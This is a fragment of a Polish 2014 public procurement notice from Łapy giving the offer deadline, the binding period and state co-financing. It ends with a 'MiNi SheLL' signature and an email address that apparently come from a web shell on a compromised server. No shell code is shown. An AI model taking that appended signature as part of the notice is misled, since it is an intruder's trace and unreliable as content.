<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.08.2014 godzina 09:30, miejsce: 18-100 Łapy, ul.Gen.Wł.Sikorskiego 24, pokój 103.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane ze środków z budżetu Państwa - Ministerstwo Sportu i Turystyki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com